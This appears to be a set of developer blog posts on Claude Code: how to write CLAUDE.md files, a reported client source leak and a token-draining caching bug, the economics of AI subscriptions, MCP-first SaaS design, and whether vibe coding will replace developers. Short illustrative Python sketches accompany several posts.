Don’t use it to make Claude smarter. Use it to prevent Claude from being stupid in specific, known ways. The difference between those two goals is the difference between a 60-line file and an 800-line file.

What Actually Belongs in CLAUDE.md

After digging through research, benchmarks, and hundreds of Reddit threads, here’s what survives the cut:

The What-Why-How skeleton (under 60 lines):

WHAT: Your stack, project structure, key directories
WHY: What this project does and for whom
HOW: Build commands, test commands, deploy commands

Negatives over positives:
“NEVER use X” sticks. “Always prefer Y” fades. If you can phrase it as a prohibition, it enforces better. “DO NOT modify the database schema without migration files” beats “Always create migrations when changing the schema.”

Trigger-action format:
“WHEN CI fails, DO NOT push until fixed” enforces consistently. “Always test before pushing” doesn’t. Specificity matters.

Pointers, not content:
Reference external docs instead of embedding them. “See agent_docs/database.md for schema guidance” loads on demand. Pasting the full schema into CLAUDE.md loads every single session, whether Claude needs it or not.

Subdirectory CLAUDE.md files:
Claude auto-loads CLAUDE.md from whatever directory it’s reading files in. Put backend rules in backend/CLAUDE.md. Put frontend rules in frontend/CLAUDE.md. Context-specific rules load only when contextually relevant.

What Doesn’t Belong

Style guides. Claude is an in-context learner. If your code follows consistent patterns, Claude will match them without being told. Use linters and formatters — they’re deterministic, fast, and don’t eat instruction budget.

LLM-generated instructions. The research is clear: auto-generated .md files hurt performance. Don’t use /init. Don’t ask Claude to write its own CLAUDE.md. The model just repeats what’s already in the code, wasting tokens to tell itself what it already knows.

Lessons learned logs. Once the lesson is codified in the codebase itself — as a test, a lint rule, a hook — the .md entry is redundant. Delete it.

Persona assignments. “You are a meticulous senior engineer who always...” is a costume, not a capability. As one developer running overnight cron agents put it: “A syntax check that returns exit code 1 on failure > 2,000 words of ‘you are a meticulous senior engineer who always...’” The agents with minimal instructions consistently outperformed the ones with elaborate persona prompts.

The Real Best Practice

Keep your CLAUDE.md under 100 lines. Ideally under 60. Put the most important rules at the top. Phrase them as negatives. Use trigger-action format. Point to external docs instead of embedding content.
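Those rules are mechanical enough to check with a script. A rough sketch, under my own assumptions: it counts non-blank lines (the advice above doesn't say whether blanks count), and the two regex heuristics for "always" rules and persona lines are illustrative, not a tested ruleset.

```python
import re

MAX_LINES = 100     # hard ceiling from the advice above
TARGET_LINES = 60   # "ideally under 60"


def lint_claude_md(text: str) -> list[str]:
    """Return human-readable warnings for the body of a CLAUDE.md file."""
    warnings = []
    non_blank = [line for line in text.splitlines() if line.strip()]
    if len(non_blank) > MAX_LINES:
        warnings.append(f"{len(non_blank)} non-blank lines: over the {MAX_LINES}-line ceiling")
    elif len(non_blank) > TARGET_LINES:
        warnings.append(f"{len(non_blank)} non-blank lines: over the {TARGET_LINES}-line target")
    for number, line in enumerate(text.splitlines(), start=1):
        if re.search(r"\balways\b", line, re.IGNORECASE):
            warnings.append(f"line {number}: 'always' rule; try a NEVER or WHEN ... DO NOT phrasing")
        if re.search(r"\byou are an?\b", line, re.IGNORECASE):
            warnings.append(f"line {number}: persona assignment; consider deleting")
    return warnings


# Hypothetical four-line file: two lines pass, two get flagged.
sample = """\
WHAT: FastAPI backend, React frontend
NEVER modify the database schema without migration files
Always test before pushing
You are a meticulous senior engineer
"""
for warning in lint_claude_md(sample):
    print(warning)
```

Run it in CI if you like, but the point is the same as the advice: a deterministic check beats another paragraph of instructions.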

Then stop optimizing and go build something.

The developers shipping the most code aren’t the ones with the fanciest CLAUDE.md architectures. They’re the ones who figured out the minimum viable instructions and moved on to the actual work.

Your CLAUDE.md is not your product. Stop treating it like one.

The Claude Code Leak Revealed a Token Drain Bug. The Real Problem Is Bigger.

Lakshmi Narasimhan — Thu, 02 Apr 2026 09:13:16 GMT

Follow-up to: Anthropic Is Losing Money on You Every Month. What Are You Shipping?

Three weeks ago, I wrote that Anthropic is losing money on every subscriber and that smart developers should ship like crazy before the economics normalize.

I was right about the thesis. I was wrong about the timeline.

The window isn’t closing in 18-24 months. It’s closing now.

What Changed in Three Weeks

Three things happened in rapid succession that accelerated the timeline:

1. Claude subscriptions doubled. Anthropic’s paid user base went from ~30k to ~60k subscribers between January and March 2026. Record growth. The Claude Code launch, Super Bowl buzz, and Cowork tools drove a wave of new signups.

2. Rate limits got brutal. Users on r/ClaudeAI went from “this is amazing” to “I can’t work” practically overnight. Pro users ($20/month) report hitting 10% of their daily quota from a single prompt. Max users ($100-200/month) report the same degradation. One Max 20x subscriber — paying $200/month — couldn’t work for nine consecutive days.

3. The source code leaked. On March 31, 2026, a 59.8 MB source map file was accidentally shipped in the Claude Code npm package. 512,000 lines of TypeScript, mirrored across GitHub within hours. And buried in that code was proof of something users had been complaining about for weeks.

The Token Drain Bug

Here’s what the leak revealed.

Claude Code has a function called db8 that filters what gets saved to session files. For non-Anthropic users, it strips out all attachment-type messages — including deferred_tools_delta records that track which tools the model already knows about.

When you resume a session, Claude Code scans your history to figure out what tools it already announced. But because db8 nuked those records, it finds nothing. So it re-announces every deferred tool from scratch. Every. Single. Resume.

This breaks prompt caching in three ways:

System reminders shift positions in the message array
The billing hash changes because the first message content differs
The cache breakpoint moves because the array length is different

Result: your entire conversation rebuilds as cache_creation tokens instead of hitting cache_read. The longer the conversation, the worse the drain.
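To see why one changed message early in the array is so expensive, here is a toy model. It assumes a cache that only reuses an exact matching prefix of the message list, and it counts one word as one token. The messages are invented for illustration; none of this is taken from the leaked code.

```python
def count_tokens(messages: list[str]) -> int:
    """Toy tokenizer: one whitespace-separated word is one token."""
    return sum(len(message.split()) for message in messages)


def split_cache_tokens(previous: list[str], current: list[str]) -> tuple[int, int]:
    """Return (cache_read, cache_creation) token counts for a prefix-matching cache."""
    shared = 0
    for old, new in zip(previous, current):
        if old != new:
            break  # everything from the first mismatch onward has to be rebuilt
        shared += 1
    return count_tokens(current[:shared]), count_tokens(current[shared:])


history = ["system prompt", "tools: read write bash", "user: fix the bug", "assistant: done"]
next_message = ["user: now add tests"]

# Normal next turn: history is unchanged, so only the new message is uncached.
normal = split_cache_tokens(history, history + next_message)

# Resume where the tool announcement is rebuilt and no longer matches.
resumed_history = ["system prompt", "tools: read write bash grep", "user: fix the bug", "assistant: done"]
resumed = split_cache_tokens(history, resumed_history + next_message)

print(normal)   # (12, 4)
print(resumed)  # (2, 15)
```

Same conversation, same new message. In the resumed case nearly everything lands in the creation bucket, and that bucket grows with the length of the conversation.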

One user wrote a two-line patch and posted it. His 5-hour usage dropped from spiralling out of control to 6% — normal levels. The post got 367 upvotes. A sharp commenter noted the patch also bypasses billing controls on cache TTL, which makes it more than a bug fix, but let’s set that aside.

Here’s the uncomfortable part: this bug was burning tokens silently for weeks. Users were complaining about rate limits. Anthropic’s status page showed “no incidents.” And the actual cause was a caching bug in their own client code.

The Math Doesn’t Work

Let’s do the numbers.

Anthropic’s annualized revenue is roughly $14 billion. Claude Code alone accounts for $2.5 billion of that run rate — up from $500 million just three months earlier. Consumer subscriptions generated about $1.2 billion in 2025, with 1,000%+ year-over-year growth.

Sounds great, right? Until you look at the other side of the ledger.

Anthropic burned approximately $5.2 billion in 2025. They’ve committed over $80 billion in cloud infrastructure costs through 2029. They just raised $30 billion in a Series G at a $380 billion valuation — the second-largest private tech financing ever, behind only OpenAI.

They’re buying compute at a staggering scale: 1 million Google TPUv7 chips (~$52 billion deal), a dedicated 1,200-acre AWS data center campus in Indiana ($11 billion), and a $50 billion deal with Fluidstack for facilities in Texas and New York. Total committed compute: over 2 gigawatts.

All of this is funded by venture capital and strategic investors (Amazon’s $8B+, Google’s $3B+). Not by your $20/month Pro subscription.

Anthropic projects positive free cash flow by 2027-2028. That’s the plan. But plans require the revenue to actually materialize, the compute to come online in time, and the unit economics to hold as usage scales.

Right now, 60,000 subscribers are overwhelming the existing infrastructure so badly that paying customers can’t work.

The Subsidy Is Collapsing Under Its Own Success

Here’s the dynamic I didn’t fully appreciate three weeks ago.

The subsidy doesn’t end with a price increase. It ends with degradation.

Anthropic can’t raise prices on Pro from $20 to $50 tomorrow — that would cause a revolt and hand users to OpenAI and Google. But they can let the service get worse at the current price. Tighter rate limits. More frequent throttling. Peak-hour queuing. Features that work “sometimes.”

This is exactly what’s happening.

The math is simple. Double the subscribers on the same compute = everyone gets half the capacity. As one Reddit user put it: “selling more seats on the same plane and wondering why legroom is shrinking.”

And Anthropic isn’t alone. Google slashed Gemini API free tier quotas by 50-92% overnight in December 2025. One developer went from 300M+ input tokens per week to hitting limits at less than 9M. OpenAI’s ChatGPT Pro at $200/month is the only major offering that effectively removes caps — but at ten times the price of a Pro subscription.

The pattern across the industry: subsidized tiers are getting squeezed. The compute costs are real. And the bill always comes due.

Why I’m Not Hitting Limits (And You Might Not Be Either)

Here’s a mystery. Despite all this chaos, I’ve barely noticed the rate limits. After reading the threads and the leaked source code, I think I know why.

I almost never resume sessions. The biggest token drain fires on session resume. My workflow — fresh sessions, agent registration per session, structured CLAUDE.md — accidentally dodges this bug entirely.

Surgical prompts. I don’t say “explore my codebase.” I say “read this file and fix this function.” My beads-based task tracking means every session has a specific objective. No wandering. No 94k-token “Explore” runs.

Time zone arbitrage. IST puts my working hours outside US peak times. When r/ClaudeAI is screaming about rate limits at 2 PM Eastern, it’s midnight for me. I’m coding at 6 AM IST when San Francisco is asleep.

Structured context. Between CLAUDE.md, ARCHITECTURE.md, and explicit file paths, Claude doesn’t need to discover my codebase. It already knows the layout. That’s 90% less indexing work.

This isn’t luck. It’s workflow design. But it reinforces the point from my original post: the subsidy rewards those who use it efficiently. Wasteful usage — open-ended exploration, resumed conversations, vague prompts — burns tokens at 10-50x the rate of focused work.

What This Means For You

If you read my original post and thought you had 18-24 months — you might, on paper. Anthropic has the cash. They have the compute commitments. They project $70 billion in revenue by 2028 and $17 billion in free cash flow.

But the experience of using the product is degrading right now. Not in 18 months. Now.

Here’s what actually matters:

1. Ship before the experience degrades further. The window isn’t about pricing — it’s about capability per dollar. Today, $20/month gets you frontier model access that would have cost $500/month in API calls two years ago. That ratio is moving in the wrong direction as more users pile in.

2. Optimize your workflow. Start fresh sessions. Use CLAUDE.md and ARCHITECTURE.md. Be specific in your prompts. Avoid “Explore” and open-ended commands. These aren’t just productivity tips — they’re rate limit survival strategies.

3. Don’t build on the assumption of unlimited AI access. If your product or workflow requires constant frontier model access at current prices, you’re building on borrowed time. Build systems that work with AI but can degrade gracefully. Ship products that generate revenue independent of your development tools.

4. The enterprise pivot is coming. Anthropic’s enterprise revenue is already 80% of total. They have 300,000+ business customers, with large accounts (>$100K ARR) growing 7x year-over-year. Follow the money: consumer subscriptions are the loss leader. Enterprise is the business. When push comes to shove, enterprise gets the compute.

The Real Lesson

The leaked source code is a metaphor for the entire AI subsidy era.

For weeks, users were burning through rate limits at impossible speeds. They blamed themselves (“skill issue”), they blamed Anthropic (“fix your limits”), they blamed the model (“Claude got dumber”). The actual cause was a two-line bug in a caching function that nobody could see because the code was proprietary.

That’s the subsidy in miniature. You’re using a product where you can’t see the internals, can’t predict the costs, and can’t control when the rules change. The value is extraordinary — right now. But you’re a guest in someone else’s infrastructure, running on someone else’s VC money, subject to someone else’s capacity planning.

The smartest move hasn’t changed since three weeks ago. Ship. Build durable assets — products, content, audiences, skills — while the arbitrage is still available.

But do it faster than you planned. The window isn’t closing in 18 months.

The glass is already cracking.

Your SaaS Audience Doubled. Half of Them Are AI Agents.

Lakshmi Narasimhan — Mon, 16 Mar 2026 13:17:55 GMT

I was building the wrong product for about three weeks before I noticed.

I’d started x-intel as a SuperX clone — essentially a better analytics dashboard for X. Charts, follower graphs, engagement breakdowns, competitor tracking. The kind of thing where you look at a number, decide you feel bad about it, and close the tab.

And then I was chatting with Claude about the onboarding flow, and I said something like: “when I say onboarding, I mean the app gets my context and goals, then charts a strategy, periodically reviews it, and course corrects.”

Claude’s response stopped me: “That’s a fundamentally different product. Less ‘setup wizard’, more ‘AI strategist that lives in your X account.’”

I stared at that for a while. Then I realized I’d been building the audit view and calling it the product.

The dashboard isn’t the product. The dashboard is what humans look at after the AI already figured out what’s happening.

Build the MCP server first. The dashboard ships itself.

The problem is everyone’s still building it the other way.

What Everyone Is Still Building

Claude Code exists. The MCP protocol exists. Power users are already interacting with SaaS products through AI agents — not because you built that integration, but because they built it themselves using whatever API you exposed. They’re writing CLAUDE.md files that say “use the Stacksweller API to schedule posts” and just... doing it.

This is happening whether you designed for it or not.

The default SaaS in 2026 still ships dashboard-first: database → API → React. Users log in, stare at charts, try to draw conclusions. That model made sense when the only consumer of your product was a human looking at a screen.

That is no longer the only consumer of your product.

You can either build for this intentionally, or have it happen to you messily and then spend six months retrofitting.

The Reframe

Here’s what x-intel actually looks like when you build it right:

Intake — Claude asks who you are, what your niche is, what your X goals are, who your competitors are. You answer in plain English. Claude turns that into a structured profile using the set_profile tool.

Baseline — Claude pulls your current stats, analyzes your last 90 tweets, benchmarks against competitors. All MCP tools calling your data layer. No UI step required.

Strategy — Claude generates a content and growth plan: post frequency, best times, content formats, topics to lean into. Stored back in your database via MCP. The strategy exists before you’ve opened a browser.

Periodic review — A cron job runs weekly analysis, compares performance against the strategy, surfaces what’s working and what isn’t. Claude writes a summary. The dashboard shows that summary.

Course correction — Strategy updates based on data. Again, through tools. Again, before a human looks at anything.

The dashboard in this architecture isn’t the product. It’s an audit log. It shows you what Claude already figured out. Charts are passive — you still have to decide what to do. This tells you what to do, and then does it.
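The periodic review step is the easiest one to picture in code. A minimal sketch of the deterministic half, comparing a week of stats against the stored strategy. The field names and thresholds are hypothetical, and in the real flow Claude would write the summary from findings like these.

```python
from dataclasses import dataclass


@dataclass
class Strategy:
    posts_per_week: int
    target_engagement_rate: float  # fraction, e.g. 0.03 for 3%


@dataclass
class WeekStats:
    posts: int
    engagement_rate: float


def weekly_review(strategy: Strategy, stats: WeekStats) -> list[str]:
    """Compare one week of stats against the stored strategy and list the gaps."""
    findings = []
    if stats.posts < strategy.posts_per_week:
        findings.append(f"posted {stats.posts} of {strategy.posts_per_week} planned posts")
    if stats.engagement_rate < strategy.target_engagement_rate:
        findings.append(
            f"engagement {stats.engagement_rate:.1%} is below "
            f"the {strategy.target_engagement_rate:.1%} target"
        )
    return findings or ["on track"]


# Hypothetical week: fewer posts than planned, engagement under target.
review = weekly_review(Strategy(5, 0.03), WeekStats(3, 0.021))
print(review)
```

The cron job runs this, stores the findings, and the dashboard only has to render them.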

That’s a completely different product. “X-intel is your AI X strategist. Tell it your goals once. It watches your account, tracks competitors, and tells you exactly what to do next.”

That pitch destroys “SuperX but self-hosted.”

How to Actually Build MCP-First

The mechanics are simpler than they sound. Embarrassingly so.

Start by designing your tools for Claude, not for humans. Think about what Claude needs to do the job — not what a human wants to click on. Tool names, parameter shapes, return values should make sense to a language model. get_competitor_engagement_trend(handle, days=30) is better than getChartData(config). One of these tells Claude what it’s getting. The other makes Claude guess.
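Here is roughly what the good version looks like as a plain Python function. The in-memory data and the "compare the two halves of the window" logic are stand-ins I made up; the point is the shape: a descriptive name, typed parameters, and a return value that says what it is. Registering it with an MCP SDK is left out.

```python
from statistics import mean

# Hypothetical data standing in for a real data layer:
# handle -> daily engagement rates, oldest first.
_ENGAGEMENT = {"@rival": [0.020, 0.022, 0.021, 0.030, 0.032, 0.031]}


def get_competitor_engagement_trend(handle: str, days: int = 30) -> dict:
    """Describe how a competitor's engagement moved over the last `days` days.

    Compares the mean of the newer half of the window with the older half.
    """
    if days <= 0:
        raise ValueError("days must be positive")
    series = _ENGAGEMENT.get(handle, [])[-days:]
    if len(series) < 2:
        return {"handle": handle, "days": days, "trend": "insufficient_data"}
    half = len(series) // 2
    older, newer = mean(series[:half]), mean(series[half:])
    trend = "up" if newer > older else "down" if newer < older else "flat"
    return {
        "handle": handle,
        "days": days,
        "trend": trend,
        "older_mean": round(older, 4),
        "newer_mean": round(newer, 4),
    }


trend_report = get_competitor_engagement_trend("@rival")
print(trend_report)
```

A model reading that name, signature, and docstring knows what to pass and what comes back. With getChartData(config) it has to guess both.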

Here’s the part nobody mentions: if you have a data layer, you have an MCP server 70% built already. Wrap your existing queries as tools. The MCP protocol is just a contract — your database doesn’t move.
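A sketch of what "wrap your existing queries" can mean in practice, using sqlite3 from the standard library. The posts table, the tool name, and the registry dict are all hypothetical; a real MCP server would do the routing for you, but the shape is similar.

```python
import sqlite3


def top_posts(conn: sqlite3.Connection, limit: int = 3) -> list[dict]:
    """An 'existing query': the most-liked posts, returned as plain dicts."""
    rows = conn.execute(
        "SELECT id, text, likes FROM posts ORDER BY likes DESC LIMIT ?", (limit,)
    ).fetchall()
    return [{"id": row[0], "text": row[1], "likes": row[2]} for row in rows]


# Hypothetical tool registry: tool name -> (description, callable).
TOOLS = {
    "get_top_posts": ("Return the most-liked posts, highest first.", top_posts),
}


def call_tool(conn: sqlite3.Connection, name: str, **arguments) -> list[dict]:
    """Dispatch a tool call by name to the query that already exists."""
    _description, handler = TOOLS[name]
    return handler(conn, **arguments)


# Throwaway in-memory database so the example runs on its own.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, text TEXT, likes INTEGER)")
conn.executemany(
    "INSERT INTO posts (text, likes) VALUES (?, ?)",
    [("launch thread", 120), ("meme", 45), ("changelog", 300)],
)
top_two = call_tool(conn, "get_top_posts", limit=2)
print(top_two)
```

The query did not change. It gained a name and a description that an agent can read.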

You don’t need to build an “AI feature.” You need a system prompt that gives Claude the right context, and tools that give it the right data. Claude is the strategist. Your MCP server is the strategist’s interface to your product. The actual work is thinking clearly about what Claude needs to know — not engineering.

Build the dashboard last, or thin. It’s a view layer. It shows stored strategies, weekly reviews, flagged anomalies. A log of decisions that were already made. Not a decision-support tool.

One Build, Two Audiences

Here’s the payoff that makes this worth doing even if you don’t care about being “AI-native.”

A well-designed MCP server makes your product useful to two completely different types of users with almost no additional work.

The first type opens the dashboard, reads the weekly strategy review, clicks to approve the suggested changes, and closes the tab. Normal SaaS behavior. They don’t know or care that Claude is behind it. They just want outcomes.

The second type connects your MCP server to their own Claude Code setup, writes a CLAUDE.md that describes how they want to use your product, and runs it themselves. These are your power users. They’ll do things with your product you never imagined, and they’ll tell everyone.

You still need the dashboard. Trials convert better with a UI. Not arguing otherwise. But the order matters: MCP layer first, dashboard second. The dashboard snaps on top in a weekend once the tools are solid. The reverse — retrofitting agent-friendly APIs onto a human-optimized interface — takes six months and still feels wrong.

Both audiences are real. Both are valuable. You get both by building the MCP layer correctly from the start, instead of bolting on an “AI integration” later when it’s expensive and awkward.

The dashboard-first founders will get there eventually. They’ll build the dashboard, grow slowly, and then spend six months retrofitting an API that was designed for human consumption into something an agent can actually use.

Or you build the MCP server first, ship a thin dashboard on top, and have both audiences from day one.

The dashboard ships itself. The strategist is Claude. The product is the tools you give it.

Stop building audit logs and calling them products.

Anthropic Is Losing Money on You Every Month. What Are You Shipping?

Lakshmi Narasimhan — Tue, 10 Mar 2026 15:23:14 GMT

I do this thing at the end of every month where I look at my Claude usage stats and feel mildly guilty.

Not guilty enough to stop, obviously. But guilty in the way you feel when you’ve been eating at a nice restaurant and you suddenly realize your friend with the expense account has been covering all of it. You’d have ordered differently if you knew that at the start.

Here’s what I know: I pay $200/month for Claude Max. Based on what I actually do with it — multi-hour Claude Code sessions, agents running in parallel, research deep-dives, content pipelines chewing through tokens like a hungry golden retriever — the API-rate equivalent of my usage is somewhere between $600 and $900. Every month.

Anthropic is losing money on me. On you. On every developer who’s turned this into a real part of how they build.

This isn’t an accident. This is the plan. And it has an expiration date.

The Hemorrhage Is Real

I was reading Sebastian Raschka’s Build a Large Language Model from Scratch last week and stumbled into a footnote that sent me down a rabbit hole. He cites Lambda Labs: it would take 355 years to train GPT-3 on a single V100 datacenter GPU. On a consumer RTX 8000: 665 years.

I know, I know — “but they use thousands of GPUs in parallel.” Yes. And those thousands of GPUs cost tens of millions of dollars for a single training run. That’s before we talk about the ongoing cost of serving that model to every user who hits the API every day. Training is the capital expenditure. Inference — every time you actually use Claude — is the operating cost. I’m talking about the second thing. Both are obscene.

Let’s look at what’s actually happening, because the numbers are — and I say this as someone who’s seen a lot of startup math — genuinely unhinged.

OpenAI’s revenue went from $3.7 billion in 2024 to over $20 billion ARR by end of 2025. Ten times in two years. Sounds like they’ve figured it out. Except their own internal projections show losses of $14 billion in 2026 — against $13 billion in revenue. The revenue explodes. The costs explode faster. Microsoft has put in $13 billion. SoftBank committed $41 billion across various tranches. A 2026 funding round valued the company at $730 billion. None of this is profit. All of it is gap-filling.

Anthropic is nearing $20 billion in annualized revenue as of early 2026 — up from $1 billion at the start of 2025. Google has put in over $3 billion in equity, plus a cloud infrastructure deal described as “tens of billions” in compute. Amazon has committed $8 billion. The Series G closed at a $380 billion valuation. These are not investments in a profitable business. These are bets on essential infrastructure, placed by people who are terrified of the alternative.

Google’s own AI division is entirely subsidized by search advertising. They watched OpenAI nearly disrupt their core business and decided that losing money on AI is preferable to losing the company. You can’t really argue with the logic. You can appreciate that the logic benefits you.

Here’s what makes this particularly strange: the more usage grows, the worse the unit economics get. OpenAI’s gross margins collapsed from roughly 40% to 33% in 2025 because inference costs quadrupled as usage scaled. They’re getting less efficient per dollar as they get bigger. The burn isn’t winding down. It’s accelerating.

They’re all playing the same game — lose money now, win the market, figure out profitability later. You’ve seen this movie. AWS subsidized startups through aggressive discounting from 2008-2015 and built the most profitable cloud business in history. Uber burned billions subsidizing rides below cost for seven years. Every streaming service ran at a loss from 2015-2022 while racing to lock in subscribers before the music stopped.

The pattern: 5-8 years of heavy subsidies. Prices normalize. The land grab ends. Survivors optimize for margin.

AI is somewhere in year 3-4 of this cycle.

Why They’re Subsidizing You Specifically

Here’s the part most people miss.

It’s not just the gym membership model — yes, light users subsidize heavy users across the subscriber base. But for developers specifically, you serve a purpose that goes way beyond the math:

You evangelize. Every blog post about Claude Code, every Hacker News comment about your workflow, every Slack recommendation to a colleague — that’s marketing no ad budget can replicate. Authentic practitioner enthusiasm is worth more than a campaign, and they get it from you for free.

You’re the top of the enterprise funnel. The conversion path goes: you try Pro, you love it, you build something real, you show your team, your team shows leadership, leadership signs a $500K enterprise contract. That single deal equals 2,500 monthly Max payments at $200 each. You’re not where the money is. You’re where the money comes from.

You stress-test the product. Power users find the edges. You file the bug reports casual users never hit. This feedback loop is genuinely expensive to replicate through formal QA — and you’re doing it gratis.

You build the ecosystem. Tutorials, repos, guides, courses. The content that helps a thousand other developers get value from the product? That’s unpaid work you’re doing for their platform.

You are, in the most literal sense, being paid for this in subsidized compute. It’s a trade. The question is whether you’re getting the better end of it.

(You are. Obviously. That’s the point.)

How Long Does the Window Stay Open?

Nobody knows. Anyone giving you a specific timeline is guessing, including me.

But the runway math doesn’t matter as much as the signals. Watch these:

Usage limits tightening. Already happening. “Unlimited” has gotten more creative in its definition. Rate limits appear. Fair use policies materialize. You’ve noticed.

Tier restructuring. The free tier gets worse. The basic tier gets capped. The premium tier develops features that used to be standard. The ladder shifts.

API price changes. When enterprise revenue is strong enough to sustain the business, the argument for subsidizing consumers weakens. Check the API pricing page periodically.

Enterprise-only features. When the best capabilities start requiring a sales call, the consumer product is no longer the growth driver.

My working model: 18-24 months of relatively stable economics. After that, genuine uncertainty.

The open-source wildcard could extend the window or change what “subsidized” even means. The gap between frontier models and the best open-weight models has compressed dramatically — we’re talking 6-12 months behind the frontier now, versus the 18-24 months people were citing a year ago. Running genuinely capable models locally on a Mac is already real, not theoretical. That’s a hedge against pricing pressure, but it doesn’t change the core argument. It just means the floor is higher than it was.

Either way: cheap access to frontier AI while the models keep getting dramatically better is the thing with the uncertain timeline. Don’t wait for a clear signal. By the time the signal is clear, the window is already closing.

What You Should Actually Be Building

This is where I have to resist the urge to give you a twenty-point tactical playbook. (I’m saving that for a separate post. Watch for it.)

The mental model is simple: use subsidized tools to build assets you own. Don’t just consume. Create.

For developers building SaaS, this means a few things specifically:

Ship the MVP, not the perfect version. Claude Code does 70% of the implementation and you do the system design and judgment calls. A SaaS MVP that would have taken three months solo two years ago takes a weekend now. These economics are extraordinary and they will not last forever. The price of “wait until it’s ready” is time you don’t have.

Build the content moat before everyone else does. Technical guides, deep-dives, tutorials on topics you actually know. This content ranks before your competitors get around to writing theirs. The window for content arbitrage — where AI-assisted quality beats raw human output at volume — is also temporary. The ones who started in 2025-2026 will own the long-tail traffic. The rest will write for audiences that already exist.

Develop taste. This is the skill that survives every model improvement and every price normalization. Knowing whether AI output is actually good — whether the code is maintainable, whether the architecture makes sense, whether the essay says something real — is something that cannot be automated. It gets more valuable as AI gets cheaper. Invest in it.

Build the audience. Newsletter subscribers, people who trust your recommendations, readers who show up when you publish. This is the asset that persists regardless of what happens to model pricing. You’re not renting audience from Anthropic. You own it.

The math I keep returning to: 18 months of focused effort with subsidized AI tools could produce 3-5 years of normal-pace output. The SaaS you’ve been procrastinating? You could ship three of them. The content backlog? Gone. The technical course based on your experience? Done.

That compounds. The skills sharpen. The audience grows. By the time pricing normalizes, you’ve already built the moat.

The Only Question That Matters

You pay $200/month. You’re getting $600-900/month in value. That arbitrage exists right now, today.

But the real arbitrage isn’t the monthly spread. It’s what you build during the window.

The people who win this period aren’t the ones who used Claude for the most impressive demo or the most clever prompt chain. They’re the ones who used cheap frontier AI access to build products, audiences, and content that persist after the subsidies end.

So: what are you shipping?

The clock’s running.

This post started as a rabbit hole triggered by a paragraph in Sebastian Raschka’s Build a Large Language Model from Scratch (Manning). His Substack is obviously worth following: @rasbt.

Will Vibe Coding Replace Developers? COBOL Already Tried.

Lakshmi Narasimhan — Sun, 08 Mar 2026 04:01:14 GMT

Last month I spent about forty minutes arguing with Claude Code about a rate limiter.

Not debugging a rate limiter. Not implementing one. Arguing. I had typed “add a usage limit to the free tier” and gotten back something that technically worked — it counted things and stopped you when you hit the limit — but was also completely wrong in about six different ways that I hadn’t specified because I hadn’t thought to specify them.

When does the counter reset? Daily? Monthly? On the billing cycle? What counts as a usage event — an API call, a feature access, a row stored? What happens at exactly 100%: hard block, soft warning, grace period where we beg you to upgrade? Do existing free users get grandfathered, or do they wake up tomorrow blocked from the thing they’ve been using for three months? What if someone hits the limit mid-checkout?

I hadn’t answered any of those questions. I had typed eight words and expected a computer to answer them for me. And the computer, being a computer (a very impressive one, but still a computer), had silently picked answers that seemed reasonable. UTC midnight resets. Hard blocks. No grandfathering.

Nobody wants UTC midnight resets. Nobody wants a hard block in the middle of checkout. And nobody, including me, had thought to say so.

That forty-minute argument was, in the precise technical sense, programming. Not in the syntax sense. In the real sense: figuring out exactly what I wanted the computer to do, in enough detail that it could actually do it.
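Written down, those unanswered questions look something like this. It's a sketch with hypothetical names and a made-up limit of 100, not the code Claude produced. Every field is a decision I had skipped; the reset field is carried but not enforced here, and a grace period is treated as a warning to keep it short.

```python
from dataclasses import dataclass
from enum import Enum


class ResetPeriod(Enum):
    DAILY = "daily"
    MONTHLY = "monthly"
    BILLING_CYCLE = "billing_cycle"


class AtLimit(Enum):
    HARD_BLOCK = "hard_block"
    SOFT_WARNING = "soft_warning"
    GRACE_PERIOD = "grace_period"


@dataclass(frozen=True)
class UsageLimitPolicy:
    limit: int
    usage_event: str            # e.g. "api_call", "feature_access", "row_stored"
    reset: ResetPeriod          # recorded for the reset job; not enforced in decide()
    at_limit: AtLimit
    grandfather_existing: bool
    block_mid_checkout: bool


def decide(policy: UsageLimitPolicy, used: int, *, existing_user: bool, in_checkout: bool) -> str:
    """Return "allow", "warn", or "block" for the next usage event."""
    if used < policy.limit:
        return "allow"
    if existing_user and policy.grandfather_existing:
        return "allow"
    if in_checkout and not policy.block_mid_checkout:
        return "warn"
    # Grace periods are simplified to a warning in this sketch.
    return "block" if policy.at_limit is AtLimit.HARD_BLOCK else "warn"


# Roughly the answers that got picked silently: daily reset, hard block, no grandfathering.
silent = UsageLimitPolicy(100, "api_call", ResetPeriod.DAILY, AtLimit.HARD_BLOCK, False, True)
# One set of answers a human might actually choose.
considered = UsageLimitPolicy(100, "api_call", ResetPeriod.BILLING_CYCLE, AtLimit.SOFT_WARNING, True, False)

print(decide(silent, 100, existing_user=True, in_checkout=True))       # block
print(decide(considered, 100, existing_user=False, in_checkout=True))  # warn
print(decide(considered, 100, existing_user=True, in_checkout=False))  # allow
```

Six fields, and my eight-word prompt had specified none of them.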

Which brings me to Grace Hopper, and why the current panic about AI replacing developers is about sixty-five years old.

In 1959, Grace Hopper helped create a programming language called COBOL.

Common Business-Oriented Language. The name is the pitch. This isn’t for programmers — it’s for business people. The syntax looked like a business memo. You wrote ADD SALESTAX TO TOTALPRICE GIVING INVOICE-TOTAL. Sentences. Paragraphs. English words that a manager could theoretically read and understand and maybe, just maybe, write.

The promise was explicit: if the language is human enough, we won’t need programmers as intermediaries. Business users could specify their own software. The bottleneck — translating business requirements into code — would evaporate.

You know how this ends. COBOL created more programmer jobs than almost any technology before or since. Banks ran it for sixty years. Governments still run it. The programmer shortage it was supposed to prevent became one of the most persistent gaps in technology. The job postings for COBOL developers today — today, in 2026 — pay embarrassingly well because the people who understand those systems are retiring and there aren’t enough people to replace them.

The promise evaporated. The programmers did not.

Now, the obvious response here is: that was 1959. We were trying to replace programmers with verbose English-looking syntax. That’s completely different from vibe coding, which uses actual English, processed by a large language model that has ingested most of human knowledge. The comparison is unfair.

Fair enough. Let me make it fair.

After COBOL came fourth-generation languages. The 70s and 80s promised that business users could generate reports and query databases without programmers. And they could! Until anything got complex, at which point someone had to specify what “complex” meant. That someone was, increasingly, a programmer with a different job title.

Then HyperCard in 1987. Anyone could build interactive applications — stacks, cards, buttons, scripts. And many people did! Wonderful things. And then the moment you wanted it to do something non-trivial, you needed to understand enough about conditional logic and data structures that you were, functionally, programming. The interface was friendlier. The underlying activity was identical.

